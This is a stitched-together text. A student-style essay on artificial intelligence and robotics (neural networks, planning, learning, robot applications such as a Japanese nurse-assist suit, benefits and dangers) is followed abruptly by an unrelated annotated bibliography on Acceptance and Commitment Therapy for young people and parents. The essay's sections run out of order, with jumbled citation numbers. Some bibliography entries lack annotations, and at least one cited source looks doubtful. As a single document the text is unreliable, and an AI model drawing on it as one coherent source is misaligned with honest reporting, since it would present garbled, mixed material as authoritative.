A neural network is an interconnected group of nodes, akin to the vast network of neurons in the human brain. The study of artificial neural networks[127] began in the decade before the field of AI research was founded, in the work of Walter Pitts and Warren McCulloch. Other important early researchers were Frank Rosenblatt, who invented the perceptron, and Paul Werbos, who developed the back-propagation algorithm.[134] The main categories of networks are acyclic or feed-forward neural networks (where the signal passes in only one direction) and recurrent neural networks (which allow feedback). Among the most popular feed-forward networks are perceptrons, multi-layer perceptrons and radial basis networks.[135] Among recurrent networks, the most famous is the Hopfield net, a form of attractor network, which was first described by John Hopfield in 1982. Neural networks can be applied to the problem of intelligent control (for robotics) or learning, using techniques such as Hebbian learning and competitive learning.[137] Jeff Hawkins argues that research in neural networks has stalled because it has failed to model the essential properties of the neocortex, and has suggested a model (Hierarchical Temporal Memory) that is based on neurological research.
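As a small concrete example of the perceptron mentioned above, the sketch below learns the logical AND function with Rosenblatt's update rule. The training data, learning rate and epoch count are illustrative choices.

```python
# Minimal perceptron sketch: learn the logical AND function.
def train_perceptron(samples, epochs=10, lr=0.1):
    """Rosenblatt update: nudge weights by (target - output) per sample."""
    w = [0.0, 0.0]
    b = 0.0
    for _ in range(epochs):
        for (x1, x2), target in samples:
            out = 1 if w[0] * x1 + w[1] * x2 + b > 0 else 0
            err = target - out
            w[0] += lr * err * x1
            w[1] += lr * err * x2
            b += lr * err
    return w, b

AND = [((0, 0), 0), ((0, 1), 0), ((1, 0), 0), ((1, 1), 1)]
w, b = train_perceptron(AND)

def predict(x1, x2):
    return 1 if w[0] * x1 + w[1] * x2 + b > 0 else 0

print([predict(x1, x2) for (x1, x2), _ in AND])  # [0, 0, 0, 1]
```

AND is linearly separable, so a single perceptron suffices; XOR is not, which is exactly the limitation that motivated multi-layer perceptrons.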
C. Approaches
There is no established unifying theory or paradigm that guides AI research. Researchers disagree about many issues.[76] A few of the most long standing questions that have remained unanswered are these: should artificial intelligence simulate natural intelligence, by studying psychology or neurology? Or is human biology as irrelevant to AI research as bird biology is to aeronautical engineering? Can intelligent behavior be described using simple, elegant principles (such as logic or optimization)? Or does it necessarily require solving a large number of completely unrelated problems?[78] Can intelligence be reproduced using high-level symbols, similar to words and ideas? Or does it require “sub-symbolic” processing?[79]
D. General Intelligence
Main articles: Strong AI and AI-complete

Most researchers hope that their work will eventually be incorporated into a machine with general intelligence (known as strong AI), combining all the skills above and exceeding human abilities at most or all of them.[12] A few believe that anthropomorphic features like artificial consciousness or an artificial brain may be required for such a project.[74] Eliezer Yudkowsky has argued for the importance of friendly artificial intelligence, to mitigate the risks of an uncontrolled intelligence explosion. The Singularity Institute for Artificial Intelligence is dedicated to creating such an AI. Many of the problems above are considered AI-complete: to solve one problem, you must solve them all. For example, even a straightforward, specific task like machine translation requires that the machine follow the author’s argument (reason), know what is being talked about (knowledge), and faithfully reproduce the author’s intention (social intelligence). Machine translation, therefore, is believed to be AI-complete: it may require strong AI to be done as well as humans can do it.[75]
E. Planning
Intelligent agents must be able to set goals and achieve them.[56] They need a way to visualize the future (they must have a representation of the state of the world and be able to make predictions about how their actions will change it) and be able to make choices that maximize the utility (or “value”) of the available choices.[57] In classical planning problems, the agent can assume that it is the only thing acting on the world and can be certain what the consequences of its actions will be.[58] However, if this is not true, it must periodically check whether the world matches its predictions, and it must change its plan as this becomes necessary, requiring the agent to reason under uncertainty.[59] Multi-agent planning uses the cooperation and competition of many agents to achieve a given goal. Emergent behavior such as this is used by evolutionary algorithms and swarm intelligence.
F. Learning
Machine learning has been central to AI research from the beginning.[62] Unsupervised learning is the ability to find patterns in a stream of input. Supervised learning includes both classification and numerical regression. Classification is used to determine what category something belongs in, after seeing a number of examples of things from several categories. Regression takes a set of numerical input/output examples and attempts to discover a continuous function that would generate the outputs from the inputs. In reinforcement learning[63] the agent is rewarded for good responses and punished for bad ones. These can be analyzed in terms of decision theory, using concepts like utility. The mathematical analysis of machine learning algorithms and their performance is a branch of theoretical computer science known as computational learning theory.
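Classification as described above can be illustrated with one of the simplest supervised methods, a 1-nearest-neighbour classifier. The 2-D points and labels below are invented for the example.

```python
# Tiny supervised classification sketch: 1-nearest-neighbour on
# invented 2-D points, each labelled with a category.
def nearest_neighbour(train, point):
    """Return the label of the training example closest to `point`."""
    def dist2(p, q):
        return (p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2
    _, label = min(train, key=lambda ex: dist2(ex[0], point))
    return label

train = [((1, 1), "small"), ((1, 2), "small"),
         ((8, 8), "large"), ((9, 7), "large")]
print(nearest_neighbour(train, (2, 1)))  # small
print(nearest_neighbour(train, (7, 9)))  # large
```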
G. Motion And Manipulation
The field of robotics[66] is closely related to AI. Intelligence is required for robots to be able to handle such tasks as object manipulation[67] and navigation, with sub-problems of localization (knowing where you are), mapping (learning what is around you) and motion planning (figuring out how to get there).
H. Knowledge Representation
Knowledge representation and knowledge engineering are central to AI research. Many of the problems machines are expected to solve will require extensive knowledge about the world. Among the things that AI needs to represent are: objects, properties, categories and relations between objects;[45] situations, events, states and time;[46] causes and effects;[47] knowledge about knowledge (what we know about what other people know); and many other, less well researched domains. A complete representation of “what exists” is an ontology (borrowing a word from traditional philosophy), of which the most general are called upper ontologies.
I. Natural Language Processing
Natural language processing[64] gives machines the ability to read and understand the languages that humans speak. Many researchers hope that a sufficiently powerful natural language processing system would be able to acquire knowledge on its own, by reading the existing text available over the internet. Some straightforward applications of natural language processing include information retrieval (or text mining) and machine translation.
IV. APPLICATIONS OF ROBOTS
Robotics has been of interest to mankind for over one hundred years. However, our perception of robots has been influenced by the media and Hollywood.
One may ask what robotics is about. In my eyes, a robot's characteristics change depending on the environment it operates in. Some of these environments are:
A. Outer Space
Manipulative arms that are controlled by a human are used to unload the docking bay of space shuttles, to launch satellites or to construct a space station.
B. The Intelligent Home
Automated systems can now monitor home security, environmental conditions and energy usage. Doors and windows can be opened automatically, and appliances such as lighting and air conditioning can be pre-programmed to activate. This assists occupants irrespective of their state of mobility.
C. Exploration
Robots can visit environments that are harmful to humans. An example is monitoring the environment inside a volcano or exploring our deepest oceans. NASA has used robotic probes for planetary exploration since the early sixties.
D. Military Robots
Airborne robot drones are used for surveillance in today’s modern army. In the future, automated aircraft and vehicles could be used to carry fuel and ammunition or clear minefields.
E. Farms
Automated harvesters can cut and gather crops. Robotic dairies are available allowing operators to feed and milk their cows remotely.
F. The Car Industry
Robotic arms that are able to perform multiple tasks are used in the car manufacturing process. They perform tasks such as welding, cutting, lifting, sorting and bending. Similar applications, but on a smaller scale, are now being planned for the food processing industry, in particular the trimming, cutting and processing of various meats such as fish, lamb and beef.
G. Hospitals
Under development is a robotic suit that will enable nurses to lift patients without damaging their backs. Scientists in Japan have developed a power-assisted suit which will give nurses the extra muscle they need to lift their patients and avoid back injuries. The suit was designed by Keijiro Yamamoto, a professor in the welfare-systems engineering department at Kanagawa Institute of Technology outside Tokyo. It will allow caregivers to easily lift bed-ridden patients on and off beds. In its current state the suit has an aluminium exoskeleton and a tangle of wires and compressed-air lines trailing from it. Its advantage lies in the huge impact it could have for nurses. In Japan, the population aged 14 and under has declined 7% over the past five years to 18.3 million this year. Providing care for a growing elderly generation poses a major challenge to the government.
Robotics may be the solution. Research institutions and companies in Japan have been trying to create robotic nurses to substitute for humans. Yamamoto has taken another approach and has decided to create a device designed to help human nurses.
In tests, a nurse weighing 64 kilograms was able to lift and carry a patient weighing 70 kilograms. The suit is attached to the wearer’s back with straps and belts. Sensors are placed on the wearer’s muscles to measure strength. These send the data back to a microcomputer, which calculates how much more power is needed to complete the lift effortlessly.
The computer, in turn, powers a chain of actuators – or inflatable cuffs – attached to the suit and worn under the elbows, lower back and knees. As the wearer lifts a patient, compressed air is pushed into the cuffs, applying extra force to the arms, back and legs. The degree of air pressure is automatically adjusted according to how much the muscles are flexed. A distinct advantage of this system is that it assists the wearer’s knees, being the only one of its kind to do so.
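The sense-compute-actuate cycle described above can be sketched as a simple proportional controller. This is a hypothetical illustration only: the function name, gain, and pressure values are illustrative assumptions, not details of Yamamoto's actual design.

```python
# Hypothetical sketch of the power-assist loop: muscle sensors feed a
# microcomputer, which inflates air cuffs in proportion to how hard the
# wearer's muscles are working. All names and numbers are illustrative.

def assist_pressure(muscle_effort: float, target_effort: float,
                    gain: float = 2.0) -> float:
    """Return cuff air pressure proportional to the effort shortfall."""
    # How much harder the muscles are working than they should need to.
    shortfall = max(0.0, muscle_effort - target_effort)
    # Scale by the controller gain, clamped to a safe maximum pressure.
    return min(gain * shortfall, 300.0)

# Example: muscles flexed at 80 units when the lift should only need 30,
# so the cuffs supply assistive pressure to cover the difference.
print(assist_pressure(80.0, 30.0))  # 100.0
```

The clamp reflects the safety constraint implied by the text: assistance scales with measured muscle flex but must never exceed what the pneumatic cuffs can safely deliver.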
Yamamoto still faces a number of hurdles. The suit is unwieldy: the wearer can’t climb stairs, and turning is awkward. For comfortable use the suit should weigh less than 10 kilograms, but the latest prototype weighs 15 kilograms. Making it lighter is technically possible by using smaller and lighter actuators. The prototype has cost less than ¥1 million (\$8,400) to develop, but earlier versions developed by Yamamoto over the past 10 years cost upwards of ¥20 million in government development grants.
H. Disaster Areas
Surveillance robots fitted with advanced sensing and imaging equipment can operate in hazardous environments, such as urban settings damaged by earthquakes, by scanning walls, floors and ceilings for structural integrity.
I. Entertainment
Interactive robots exhibit behaviours and learning ability. SONY has one such robot, which moves freely, plays with a ball and can respond to verbal instructions.
V. BENEFITS
A. Production Benefits
Robots have the ability to consistently produce high-quality products and to perform tasks precisely. Since they never tire and can work nonstop without breaks, robots are able to produce more quality goods or execute commands more quickly than their human counterparts.
B. Management Benefits
Robot employees never call in sick, never waste time and rarely require preparation time before working. With robots, a manager never has to worry about high employee turnover or unfilled positions.
C. Employee Benefits
Robots can do the work that no one else wants to do: the mundane, dangerous, and repetitive jobs. A common misconception about robots is that introducing them into a work environment necessarily means the elimination of jobs. In fact, with the addition of robots comes the need for highly skilled human workers.
D. Consumer Benefits
Robots produce high-quality goods. Since robots produce so many quality goods in a shorter amount of time than humans, we reap the benefits of cheaper goods. Because products are produced more quickly, this significantly reduces the amount of time we must wait for products to come to the marketplace.
VI. SHORTCOMINGS
Fears and concerns about robots have been repeatedly expressed in a wide range of books and films. A common theme is the development of a master race of conscious and highly intelligent robots, motivated to take over or destroy the human race. (See The Terminator, Runaway, Blade Runner, Robocop, the Replicators in Stargate, the Cylons in Battlestar Galactica, The Matrix, THX-1138, and I, Robot.) Some fictional robots are programmed to kill and destroy; others gain superhuman intelligence and abilities by upgrading their own software and hardware. Examples of popular media where the robot becomes evil are 2001: A Space Odyssey, Red Planet, … Another common theme is the reaction, sometimes called the “uncanny valley”, of unease and even revulsion at the sight of robots that mimic humans too closely.[99] Frankenstein (1818), often called the first science fiction novel, has become synonymous with the theme of a robot or monster advancing beyond its creator. In the TV show Futurama, the robots are portrayed as humanoid figures that live alongside humans, not as robotic butlers: they still work in industry, but they also lead daily lives of their own.
Manuel De Landa has noted that “smart missiles” and autonomous bombs equipped with artificial perception can be considered robots, and they make some of their decisions autonomously. He believes this represents an important and dangerous trend in which humans are handing over important decisions to machines.[100]
Marauding robots may have entertainment value, but unsafe use of robots constitutes an actual danger. A heavy industrial robot with powerful actuators and unpredictably complex behavior can cause harm, for instance by stepping on a human’s foot or falling on a human. Most industrial robots operate inside a security fence which separates them from human workers, but not all. Two robot-caused deaths are those of Robert Williams and Kenji Urada. Robert Williams was struck by a robotic arm at a casting plant in Flat Rock, Michigan on January 25, 1979.[101] 37-year-old Kenji Urada, a Japanese factory worker, was killed in 1981; Urada was performing routine maintenance on the robot, but neglected to shut it down properly, and was accidentally pushed into a grinding machine.
VII. CONCLUSIONS
If current developments are to be believed, the next wave of robots will, with the help of AI, bear a striking resemblance to humans. The Indian automotive industry has finally awakened to the fact that robotics is not just about saving labour; it also helps companies significantly step up productivity and quality to meet the demands of international competition. Industrial robots suit the production industry because of their speed, accuracy, and reduced labour requirements. As globalization accelerates, robotics is increasingly vital to maintaining the health of the industrial sector and keeping manufacturing jobs at home. “Now more than ever, the need to stay competitive is a driver for investing in robotics. Companies all over the world are often faced with difficult choices: Do they send their manufacturing to low-cost producers overseas? Or do they invest in robotics to continue making products here?” We conclude that more companies are realizing that robotics is the better option.

## Applications and Adaptations of Acceptance and Commitment Therapy (ACT) for Adolescents

Blackledge, J., & Hayes, S. (2006). Using Acceptance and Commitment Training in the Support of Parents of Children diagnosed with Autism. Child and Family Behavior Therapy, 28(1), 1-18. doi: 10.1300/J019v28n01_01

Blackledge and Hayes (2006) investigated the effectiveness of a 2-day (14-hour) group-format Acceptance and Commitment Therapy (ACT) intervention on the depression and distress of parents and caregivers of children with an autism diagnosis. The intervention was presented as a supportive and collective experience to give parents and caregivers better methods for coping with the difficulties and stress of supporting an autistic child. The authors aimed to evaluate the effectiveness of the ACT intervention, recruiting participants from three differing geographical regions in an attempt to obtain a representative sample of parents in this situation. The study used self-report instruments measuring therapeutic mechanisms of change and outcomes in depression, distress, and perceived control over the children’s behaviour. ACT-specific concepts were measured using the Acceptance and Action Questionnaire-9-item version (AAQ), which measures experiential avoidance, cognitive fusion, and difficulty acting in the presence of adverse private events, and the Automatic Thoughts Questionnaire (ATQ-B), which measures the frequency of an individual’s automatic negative thoughts. The psychological needs of parents and caregivers of children diagnosed with autism are largely ignored. The focus of this study was on the decrease in distress and depression levels of these parents post-treatment, and it attempted to reassess treatment gains 3 months after the completion of treatment. Limitations of this study included the small trial of only 20 participants, meaning the study could not control for social support or expectancy. Furthermore, the process measures used in the study were not optimal, and many of the participants were not highly distressed, despite the intervention analysing the effects of this training on levels of distress.
Due to the very general process measures applied in the study, it was unknown whether parents and caregivers improved in accepting difficult emotions and defusing from aversive cognitions. The study found that the use of ACT with parents and caregivers of children diagnosed with autism is effective in reducing the process measures of experiential avoidance and cognitive fusion. The study additionally provides evidence that ACT can help this population adjust to the difficulties associated with raising their children. Given that parents and caregivers often have high rates of depressive and anxiety disorders, this study is beneficial in examining the support and care needed to raise autistic children and provides evidence that ACT may improve the psychological situation faced by these parents and caregivers (Breslaud & Davis, 1986). Results from this study indicate that the creation of an ACT family-based treatment for both parents and autistic children may be of value.

Murrell, A., & Scherbarth, A. (2011). State of the research & literature address: ACT with children, adolescents and parents. The International Journal of Behavioral Consultation and Therapy, 7(1), 15-22. doi: 10.1037/h0101005

Murrell and Scherbarth (2011) present a review of empirical and theoretical work on the use of Acceptance and Commitment Therapy (ACT) with youth and parents. Personal communication, online databases, and ACT-related websites were used to gather information on published and unpublished work. The authors aimed to summarise the state of ACT work with children, adolescents, and their parents and to pose further questions and recommendations for ACT researchers. Published articles were identified using the PsychInfo database, with search terms including ‘ACT’ or ‘Acceptance’, and ‘child’, ‘adolesc’, or ‘parent’. Unpublished work was found in published articles, through research lab links, or directly from prominent researchers in the domain of ACT with youth. The review only included articles written in English. The research on ACT with youth and parents focuses on individual problems in children and adolescents, such as anxiety disorders and chronic pain, and in parents, such as impaired parenting. Limitations involve the issue of treatment measures, which should reflect the acceptance and valuing components of ACT and not solely traditional measures of symptomatology. Additionally, although many treatment protocols included measures of functionality, some did not, and there appears to be no standardized measure of valuing for children. Furthermore, most study designs were case studies and uncontrolled group-design studies; for gold-standard treatment studies, larger samples and controlled designs are crucial. In support of previous research, it was concluded that ACT appears beneficial for parents in aiding therapeutic progress in youth. This review adds to the limited literature available on ACT work conducted with children, adolescents, and their parents.
Additionally, the authors provide recommendations that will be valuable to future researchers and the community of ACT.

Swain, J., Hancock, K., Dixon, A., Koo, S., & Bowan, J. (2013). Acceptance and Commitment Therapy for anxious children and adolescents: Study protocol for a randomised controlled trial. Trials, 14(140),  1-12. doi:  10.1186/1745-6215-14-140.

The paper describes and evaluates a protocol for Acceptance and Commitment Therapy (ACT) for children and adolescents with a diagnosed anxiety disorder. The aim is to determine the effectiveness of a manualized ACT group-therapy programme in treating anxiety disorders in youth. Additionally, the authors aim to identify which mechanisms of change in the ACT intervention are crucial to changes in outcome measures for the adolescent participants. The randomised controlled trial will randomise patients to ACT, Cognitive Behavior Therapy (CBT), or a waitlist control. Participants in the ACT or CBT groups will receive ten weekly 1.5-hour group-therapy sessions, whilst participants in the control group will receive CBT after 10 weeks. Repeated measures are to be taken immediately after the completion of therapy and three months post-therapy. The scope of the study is to add to the paucity of research regarding the efficacy of ACT in youth with anxiety. Limitations are not definite as the trial has not yet been completed; however, it is suggested that difficulties may arise concerning recruitment and retention of participants, particularly adolescents. The authors conclude that to date this will not only be the largest trial of ACT in the treatment of youth, but also the first randomised controlled trial to examine the effectiveness of ACT in youth with a diagnosed anxiety disorder. This study will be of value by adding to the current research and literature, and it has the potential to provide extensive data on the effectiveness of ACT for anxiety disorders and the mechanisms involved in the process of change. Furthermore, this study may provide methods for parents to help their children and give useful information for selecting treatments in contemporary clinical practice.

Swain, J., Hancock, K., Hainsworth, C., & Bowman, J. (2013). Acceptance and Commitment Therapy in the treatment of anxiety: A systematic review. Clinical Psychology Review, 33(8), 965-978. doi: 10.1016/j.cpr.2013.07.002

Swain, Hancock, Hainsworth and Bowman (2013) conducted a broad systematic review examining the effectiveness of Acceptance and Commitment Therapy (ACT) in the treatment of anxiety. Databases such as PsychInfo, PsychArticles, and Medline were searched for published data up to October 2012. The Proquest database was used to identify unpublished literature, such as dissertations and theses. Furthermore, reference lists were analysed and citation searches conducted. The study aimed to evaluate the empirical research for ACT in the treatment of anxiety, including both published and unpublished literature, and to assess the utility of ACT in treating anxiety. Data were extracted from studies that met the inclusion criteria: ACT intervention studies applying a minimum of two of ACT’s core processes; studies specifically aimed at treating anxiety disorders, problem anxiety, or anxiety symptoms; outcome measures designed to determine reduction or remission of anxiety symptoms and of established psychometric quality; and articles prepared in English. A quality-assessment method, the Psychotherapy Outcome Study Methodology Rating Form (POMRF), which examines 22 individual methodological elements, was used to review the articles. The scope of the study involves applying ACT specifically to anxiety disorders and treating anxious symptoms. The study focuses on outcomes that include reductions in clinician-rated and self-report anxiety measures and on investigating whether diagnostic criteria are still met for a given anxiety disorder. Results are tentative due to the limited number and quality of eligible studies. Because the relationship between effect sizes and POMRF scores was unknown, no analysis of this relationship could be conducted. The POMRF assessment of methodological rigour identified that the majority of studies demonstrated fundamental design errors, such as the lack of a control comparison.
Most disorders were examined by only a small number of studies using various outcome assessment tools, making comparisons challenging. Additionally, it was difficult to compare the effectiveness of ACT to other psychological treatments because studies were often underpowered to detect differences, or between-group analyses were not reported. Furthermore, as is typical in this domain of research, problems were found in the variety of therapeutic terminology used, the diversity of treatment modalities, and some statistically insignificant findings. The review, which used broad inclusion criteria and literature to maximise findings and reduce publication bias, provides preliminary evidence for ACT in the treatment of anxiety in clinical and nonclinical populations. Furthermore, ACT demonstrated statistically significant results in both individual and group formats. This review adds to the current literature by providing preliminary support for the utility of ACT as an alternative intervention in the treatment of anxiety. However, additional research is required to examine the effectiveness of ACT for specific anxiety disorders and underrepresented populations, such as youth and the elderly.

Pahnke, J., Lundgren, T., Hursti, T., & Hirvikoski, T. (2014). Outcomes of an Acceptance and Commitment Therapy-based skills training group for students with high-functioning autism spectrum disorder: A quasi-experimental pilot study. Autism, 18(8), 953-964. doi: 10.1177/1362361313501091

Using a quasi-experimental design, this study investigated the feasibility and outcomes of a 6-week Acceptance and Commitment Therapy (ACT) training programme for a group of young adults with high-functioning autism. The study aimed to evaluate whether an ACT model, modified to make it feasible for individuals with autism spectrum disorder (ASD), reduces stress and emotional distress and increases psychological flexibility in individuals with ASD. The intervention used acceptance and mindfulness skills and behaviour-change procedures to help individuals with ASD deal with difficult emotions, cognitions and bodily sensations. Additionally, the intervention aimed to break experiential-avoidance patterns and to assist in identifying valued life directions and then acting accordingly. Furthermore, it was proposed that the intervention would help individuals with ASD acquire skills to cope with uncomfortable mental events and sensory inputs and to use goal-directed behaviours. The study recruited participants diagnosed with ASD within a special school environment to increase the ecological validity of the intervention. Participant characteristics were recorded, and the outcomes of the intervention were measured by the Stress Survey Schedule, the Strengths and Difficulties Questionnaire (SDQ), and the Beck Youth Inventories (BYI). The Stress Survey Schedule and the SDQ were teacher- and self-rated, whereas the BYI was self-rated only. Using the 6-week ACT training programme, the study focused on decreasing levels of stress, hyperactivity and emotional distress and on increasing prosocial behaviour and psychological flexibility. The main limitations identified were the small sample size and low statistical power, which limited the analyses of potential effects of background factors, such as gender, IQ, age, and co-morbidity, on the treatment results.
The ACT programme resulted in a decrease in student- and teacher-reported stress and an increase in self-reported prosocial behaviour. It was concluded that the ACT training programme has the potential to be an effective treatment that is feasible in a special school environment and may be useful in reducing stress and psychiatric symptoms in young adults with ASD. The results of this research are important for the development and implementation of ACT-based treatment programmes for young individuals with ASD. To test the validity of the intervention, larger studies and replications of the programme in various environments would be beneficial.

Halliburton, A., & Cooper, L. (2015). Applications and adaptations of Acceptance and Commitment therapy (ACT) for adolescents. Journal of Contextual Behavioral Science, 4(1), 1-11. doi: 10.1016/j.jcbs.2015.01.002

Livheim, F., Hayes, L., Ghaderi, A., Magnusdottir, T., Hogfeldt, A., Rowse, J., … Tengstrom, A. (2015). The effectiveness of Acceptance and Commitment Therapy for adolescent mental health: Swedish and Australian pilot outcomes. Journal of Child and Family Studies, 24(4), 1016-1030. doi: 10.1007/s10826-014-9912-9

Wicksell, R., Kanstrup, M., Kemani, M., Holmstrom, L., & Olsson, G. (2015). Acceptance and Commitment Therapy for children and adolescents with physical health concerns. Current Opinion in Psychology, 2, 1-5. doi: 10.1016/j.copsyc.2014.12.029

The article provides an overview of the research conducted on Acceptance and Commitment Therapy (ACT) for youth who have physical concerns such as pain, acquired brain injuries, cystic fibrosis, and sickle cell disease. The authors aimed to identify whether ACT is effective at improving or retaining functioning in youth with physical concerns, and whether this is maintained in the presence of longstanding symptoms and associated distress. Papers for this review came either from an ongoing systematic review of ACT and pain or from complementary searches in PubMed and PsychInfo. Measures of outcome and process variables in children included the Chronic Pain Acceptance Questionnaire (CPAQ) and the Psychological Inflexibility in Pain Scale. Measures to assess parental processes included the Parent Psychological Flexibility Questionnaire (PPFQ) and the adapted parent version of the CPAQ. The paper focuses on the treatment effects of ACT in developing guidelines to match specific interventions to individuals, maximising their effectiveness. The main limitation was the small number of studies conducted on ACT in youth with physical concerns. Additionally, the majority of the studies involved individuals suffering from chronic undefined pain, and the methodological quality varied widely; thus no conclusions could be drawn concerning how ACT works and for whom. In conclusion, ACT appears promising in the treatment of youths with physical concerns, and ACT-oriented interventions may enhance the effects of medical interventions. However, it is emphasised that more research is required to evaluate ACT. This paper is valuable in determining the utility of an ACT approach in the treatment of a specific population and therefore provides beneficial supplementary information for the research of ACT.

Swain, J., Hancock, K., Dixon, A., & Bowman, J. (2015). Acceptance and Commitment Therapy for children: A systematic review of intervention studies. Journal of Contextual Behavioral Science, 4(2), 73-85. doi:10.1016/j.jcbs.2015.02.001

A systematic review was completed by Swain, Hancock, Dixon and Bowman (2015) examining published and unpublished research on Acceptance and Commitment Therapy (ACT) interventions for children. With the increasing number of available studies, the aim of this systematic review was to examine the evidence for ACT in the treatment of children and to support future evidence-based clinical decision-making in this domain. Furthermore, the authors intended to deliver an integrated synthesis of the literature, including an analysis of the findings and an evaluation of the methodological rigour of the included studies. The authors used broad inclusion criteria in order to maximise review breadth. Quality assessment was administered using the 22-item “Psychotherapy outcome study methodology rating form” (POMRF), which has been recognised as a critical step in progressing the field (Gaudiano, 2009). The POMRF rates methodological items such as research design and therapist training, and assigns each study an overall score between 0 and 44, with higher scores demonstrating greater methodological rigour. The reviewed research predominantly focused on quality-of-life outcomes, symptoms, and psychological flexibility on measures reported by parents, clinicians, and patients, and on the maintenance of treatment gains at follow-up assessment. The authors acknowledge that limitations of the intervention studies may include author bias, which cannot be ruled out because the majority of the studies were administered by a group of affiliated researchers. This is also associated with therapist allegiance, experience, and skill, both of which may inadvertently distort study outcomes through preferences towards a treatment or theory and through treatment gains related to the experience of the therapist (Luborsky, Singer, & Luborsky, 1975).
Another limitation is the lack of measurement of quality-of-life (QOL) outcomes, which have been suggested to reflect the clinical significance of changes and the effectiveness of ACT. The review concludes that emerging evidence indicates ACT is effective in the treatment of children across an extensive range of issues. However, the authors emphasise the need for larger-scale, methodologically rigorous trials from a wider range of research groups, research on various age groups, and ACT treatment delivered through group or family-based formats to further strengthen these findings. This review provides evidence that clinicians may regard ACT as a feasible therapeutic option when working with children. Furthermore, it is proposed that ACT may be used with individuals with intellectual disabilities, such as autism.

Leoni, M., Corti, S., Cavagnola, R., Healy, O., & Noone, S. (2016). How Acceptance and Commitment Therapy changed the perspective on support provision for staff working with intellectual disability. Advances in Mental Health and Intellectual Disabilities, 10(1), 59-73. doi: 10.1108/AMHID-09-2015-0046

The authors acknowledge that a career in mental health can be emotionally and psychologically demanding, increasing the risk of burnout and psychological distress; however, such a profession can also be rewarding and satisfying. The article examines the effects of interventions for professionals working with individuals with intellectual disabilities, with a particular focus on the efficacy of Acceptance and Commitment Therapy (ACT) training. The paper aims to develop and facilitate an improved understanding of distressing processes and of methods to build positive resources that promote well-being. Relevant theoretical models and literature on stress reduction were examined from a Cognitive Behaviour Therapy (CBT) approach, with a specific focus on ACT. The paper focused on the wellbeing and behaviour of professionals who support individuals with intellectual disabilities, in addition to ACT and other third-wave behavioural approaches. The paper acknowledges limitations, including that when staff behaviour becomes controlled by cognitions it is difficult to develop a reliable measure of these thoughts and the level of fusion. Additionally, small sample sizes in the interventions and the need for replication studies to investigate the impact of ACT in specific intellectual-disability settings (e.g. gender, age, type and frequency of therapy) are noted. Furthermore, it is acknowledged that it may be challenging to state whether changes in stress levels result exclusively from ACT or from a combination of ACT and ABA training, as ACT training contains elements of ABA (Bethay, Wilson, Schnetzer, & Nassar, 2013). The research provides evidence that ACT-based interventions appear promising in improving the well-being of professionals working with individuals with intellectual disabilities, in addition to reducing the risk of burnout and increasing psychological flexibility.
Brief ACT workshops were also found to be effective in reducing occupational stress and increasing feelings of efficacy. This research is of value as it provides evidence that the implementation of ACT interventions can be effective and beneficial both for staff and for the individuals with intellectual disabilities whom they support.

Villatte, JL., Vilardaga, R., Villatte, M., Vilardaga, JC., Atkins, DC., & Hayes, SC. (2016). Acceptance and Commitment Therapy modules: Differential impact on treatment processes and outcomes. Behaviour Research and Therapy, 77, 52-61. doi: 10.1016/j.brat.2015.12.001

The authors emphasise the impact of selecting and implementing components of Acceptance and Commitment Therapy (ACT), a promising candidate for modularization. ACT open consists primarily of procedures focusing on the acceptance and cognitive-defusion processes of the psychological flexibility model, which aim to decrease the occurrence of detrimental responses to cognitions, sensations, and feelings. ACT engaged consists of procedures targeting the values and action processes of the psychological flexibility model and intends to increase motivation and meaningful behaviour. The study aims to investigate the functional relationships between ACT intervention components, processes, and outcomes, which will aid the development of a modular, transdiagnostic treatment for adults. Fifteen adults who met the inclusion criteria, which required meeting clinical case status on the Brief Symptom Inventory and being aged 18 years or over, were included in the study. Seven participants were allocated to ACT open and eight to ACT engaged. Treatment outcomes were based on the severity of psychological symptoms and quality of life. The study focused on evaluating the specific effects of each ACT component (ACT open and ACT engaged) on treatment processes and outcomes when employed in clinical service settings. One identified limitation was the small sample size (N=15), which indicates that the study should be replicated in a larger sample across various therapists, treatment settings, and participants. Both ACT open and ACT engaged produced broad symptom improvements, increases in quality of life, high treatment acceptability and completion rates, and satisfaction from participants. Treatment effects were also maintained at a 3-month follow-up.
Therefore, it is suggested that ACT components could be included in a modular approach to building evidence-based psychosocial interventions for adults. The results of the study are of value at a clinical and community level, as they highlight the differences in implementation between the two ACT components and show the effectiveness of the ACT process with adults seeking mental health treatment.

Ong, C., Lee, E., & Twohig, M. (2018). A meta-analysis of dropout rates in acceptance and commitment therapy. Behaviour Research and Therapy, 104, 14-33. doi: 10.1016/j.brat.2018.02.004

The article examines the overall acceptability of Acceptance and Commitment Therapy (ACT) and how it compares to other empirically supported treatments. The authors conducted a meta-analysis to investigate the rate at which individuals drop out of ACT interventions. The aims of the study were to examine dropout rates in ACT across a wide variety of psychological and behavioural issues, to compare dropout rates in ACT to those in other psychological interventions, and to determine moderators of dropout in ACT, such as client characteristics and therapy variables. For studies to be included in the meta-analysis, which was conducted following the PRISMA guidelines, they had to meet specific criteria, including: random assignment to treatment condition; inclusion of at least one comparison condition; participants having a psychological diagnosis, behavioural issue, or physical diagnosis; therapy conducted face-to-face and in line with the ACT protocol; and publication in English. The authors used the Psychotherapy Outcome Study Methodology Rating Scale to analyse results from 68 studies. The review focused on the dropout rate, a crucial aspect of treatment utility, of clients who participate in ACT. As the meta-analysis focused solely on randomized controlled trials, the generalizability of the results to other settings is limited. Due to insufficient data, the authors acknowledge that analyses of moderating variables that may be associated with dropout could not be conducted. Additionally, because of the limited data, dropout rates were investigated only on the basis of overall attrition and may be higher than reported. The included studies did not use the same scales, which complicates the analysis of results. In addition to effectiveness comparable to other treatments, ACT demonstrates comparable dropout rates.
Therapist experience was identified as a factor that can significantly influence dropout, with higher-level clinicians/therapists associated with increased dropout rates. The study reveals no significant difference in dropout rates between ACT and other interventions, suggesting that ACT can be effective for a range of psychological and behavioural health concerns. However, it should be acknowledged that studies with high dropout rates may not have been published, so the results of this meta-analysis may be skewed.


